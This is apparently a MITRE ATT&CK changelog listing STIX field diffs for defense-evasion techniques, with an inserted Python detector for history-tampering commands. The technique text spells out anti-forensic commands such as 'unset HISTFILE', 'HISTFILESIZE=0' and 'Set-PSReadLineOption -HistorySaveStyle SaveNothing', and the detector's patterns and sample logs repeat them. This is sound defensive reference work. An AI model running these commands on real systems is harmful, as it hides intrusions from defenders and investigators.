| Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015) Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20 19:01:56.752000+00:00 | 2022-03-25 15:59:09.632000+00:00 |
| external_references[2]['description'] | Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020. | Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021. |
| external_references[2]['url'] | http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf | https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Creation |
| x_mitre_data_sources[1] | File: File Creation | File: File Metadata |
| x_mitre_data_sources[2] | Application Log: Application Log Content | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[4] | File: File Metadata | Application Log: Application Log Content |
| x_mitre_data_sources[5] | User Account: User Account Creation | Script: Script Execution |
| x_mitre_data_sources[6] | User Account: User Account Metadata | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[7] | File: File Modification | Firmware: Firmware Modification |
| x_mitre_data_sources[8] | Script: Script Execution | Process: OS API Execution |
| x_mitre_data_sources[9] | Process: OS API Execution | User Account: User Account Creation |
| x_mitre_data_sources[10] | Windows Registry: Windows Registry Key Modification | User Account: User Account Metadata |
| x_mitre_data_sources[11] | Firmware: Firmware Modification | File: File Modification |
| Description |
|---|
| Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 23:52:52.536000+00:00 | 2022-05-05 04:07:01.191000+00:00 |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Service: Service Metadata |
| x_mitre_data_sources[1] | Process: Process Creation | File: File Modification |
| x_mitre_data_sources[3] | Command: Command Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[4] | Service: Service Metadata | Process: Process Creation |
| x_mitre_data_sources[6] | File: File Modification | Command: Command Execution |
| x_mitre_defense_bypassed[1] | Application control | Application Control |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. 
Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. | |
| external_references | CAPEC-13 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-13 | |
| external_references | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-24 13:59:12.787000+00:00 | 2022-09-01 20:48:29.785000+00:00 |
| description | Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging). |
| external_references[1]['source_name'] | capec | Sophos PowerShell command audit |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/13.html | https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit |
| external_references[3]['source_name'] | Sophos PowerShell command audit | Sophos PowerShell Command History Forensics |
| external_references[3]['description'] | jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. |
| external_references[3]['url'] | https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics |
| external_references[4]['source_name'] | Sophos PowerShell Command History Forensics | capec |
| external_references[4]['url'] | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics | https://capec.mitre.org/data/definitions/13.html |
| x_mitre_detection | Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. |
Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to clear or disable historical log data with built-in features native to the network device platform. Monitor such command activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations. |
| x_mitre_version | 2.0 | 2.2 |
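The detection text above names concrete observables: PowerShell command lines carrying `-HistorySaveStyle SaveNothing` or `Set-PSReadLineOption -HistorySavePath`, shell commands that unset or shrink `HISTFILE`/`HISTFILESIZE` or change `HISTCONTROL`, network device `no logging` commands, and user sessions whose command telemetry shows activity while `.bash_history` does not grow. The following is an added example (not code from ATT&CK or any cited source) that turns those observables into a small detector: it scans constructed command-execution log lines in an assumed `host user platform command` format, and separately flags sessions where commands were observed but the history file gained no lines. The log format, the sample lines and the `MIN_COMMANDS` threshold are all assumptions for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real data). Assumed format per line:
# "<host> <user> <platform> <command line>"
SAMPLE_LOG = """\
ws01 alice windows powershell.exe -NoProfile -Command Get-Process
ws01 alice windows powershell.exe -Command "Set-PSReadLineOption -HistorySaveStyle SaveNothing"
ws02 bob windows pwsh.exe -c "Set-PSReadlineOption -HistorySavePath C:\\Temp\\h.txt"
srv01 carol linux unset HISTFILE
srv01 carol linux export HISTFILESIZE=0
srv01 carol linux export HISTCONTROL=ignorespace
srv02 dave linux ls -la /var/log
rtr01 eve network no logging
rtr01 eve network show running-config
"""

# Constructed per-session counters (assumed to come from process telemetry and
# file-modification monitoring): (host, user, commands_seen, history_lines_added)
SAMPLE_SESSIONS = [
    ("srv01", "carol", 12, 0),  # commands ran, history file never grew
    ("srv02", "dave", 8, 8),    # normal: every command reached .bash_history
    ("srv03", "frank", 1, 0),   # too little activity to judge
]

# Sessions with fewer observed commands than this are not flagged (assumed threshold).
MIN_COMMANDS = 5


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    command: str


# Each rule maps a name to a pattern for one indicator named in the detection text.
# PowerShell cmdlet and parameter names are case-insensitive, hence re.I there.
RULES = [
    ("psreadline_save_nothing", re.compile(r"-HistorySaveStyle\s+SaveNothing", re.I)),
    ("psreadline_history_path", re.compile(r"Set-PSReadLineOption\b.*-HistorySavePath", re.I)),
    ("shell_histfile_unset", re.compile(r"\bunset\s+HISTFILE\b")),
    ("shell_histfilesize_zero", re.compile(r"\bHISTFILESIZE=0\b")),
    ("shell_histcontrol_change", re.compile(r"\bHISTCONTROL=")),
    ("netdev_no_logging", re.compile(r"^\s*no\s+logging\b", re.I)),
]


def parse_line(line):
    """Split one log line into (host, user, platform, command); None if malformed."""
    parts = line.split(" ", 3)
    if len(parts) < 4:
        return None
    host, user, platform, command = parts
    return host, user, platform, command


def scan_log(text):
    """Return a Finding for every (line, rule) pair where the command matches."""
    findings = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        host, user, _platform, command = rec
        for name, pattern in RULES:
            if pattern.search(command):
                findings.append(Finding(host, user, name, command))
    return findings


def findings_by_user(findings):
    """Count findings per user so repeat offenders stand out in triage."""
    counts = {}
    for f in findings:
        counts[f.user] = counts.get(f.user, 0) + 1
    return counts


def silent_sessions(session_stats, min_commands=MIN_COMMANDS):
    """Flag sessions where command telemetry shows activity but .bash_history did not grow.

    This is the "distinct lack of new commands in .bash_history" clue from the
    detection text, expressed as a comparison of two independent data sources.
    """
    return [
        (host, user)
        for host, user, seen, added in session_stats
        if seen >= min_commands and added == 0
    ]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.host} {f.user} [{f.rule}] {f.command}")
    print("silent sessions:", silent_sessions(SAMPLE_SESSIONS))
```

Both checks rely on telemetry that the history file itself cannot tamper with: process creation or command execution records for the pattern rules, and file modification monitoring for the silent-session rule. Correlating those two sources is what distinguishes an idle session from one whose history logging was disabled.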
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_platforms | Network | |
| Description |
|---|
| Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 13:37:31.463000+00:00 | 2022-10-19 16:32:56.502000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Cloud Service: Cloud Service Modification |
| x_mitre_data_sources[1] | Process: Process Termination | Firewall: Firewall Rule Modification |
| x_mitre_data_sources[2] | Windows Registry: Windows Registry Key Modification | Process: Process Termination |
| x_mitre_data_sources[3] | Windows Registry: Windows Registry Key Deletion | Service: Service Metadata |
| x_mitre_data_sources[4] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[5] | Service: Service Metadata | Driver: Driver Load |
| x_mitre_data_sources[6] | Sensor Health: Host Status | Firewall: Firewall Disable |
| x_mitre_data_sources[7] | Script: Script Execution | Command: Command Execution |
| x_mitre_data_sources[8] | Firewall: Firewall Disable | Cloud Service: Cloud Service Disable |
| x_mitre_data_sources[9] | Firewall: Firewall Rule Modification | Windows Registry: Windows Registry Key Deletion |
| x_mitre_data_sources[10] | Cloud Service: Cloud Service Modification | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[11] | Cloud Service: Cloud Service Disable | Sensor Health: Host Status |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Script: Script Execution | |
| Old Description | New Description |
|---|---|
| Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) | Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. 
Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-12 18:28:27.948000+00:00 | 2022-03-08 21:27:49.094000+00:00 |
| description | Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) | Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. 
Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) |
| x_mitre_version | 2.0 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Image: Image Metadata | |
| Old Description | New Description |
|---|---|
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. |
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022. | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-571 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-13 15:56:04.897000+00:00 | 2022-06-30 16:44:16.962000+00:00 |
| description | An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. |
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck). |
| external_references[1]['source_name'] | capec | LemonDuck |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/571.html | https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/ |
| x_mitre_data_sources[1] | Sensor Health: Host Status | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Sensor Health: Host Status |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/571.html', 'external_id': 'CAPEC-571'} | |
| Old Description | New Description |
|---|---|
| Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. | Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform. Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-27 15:23:52.099000+00:00 | 2022-10-21 16:12:54.457000+00:00 |
| name | Indicator Removal on Host | Indicator Removal |
| description | Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. | Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform. Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. |
| x_mitre_data_sources[0] | Process: Process Creation | Process: OS API Execution |
| x_mitre_data_sources[1] | File: File Deletion | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[3] | Windows Registry: Windows Registry Key Modification | File: File Deletion |
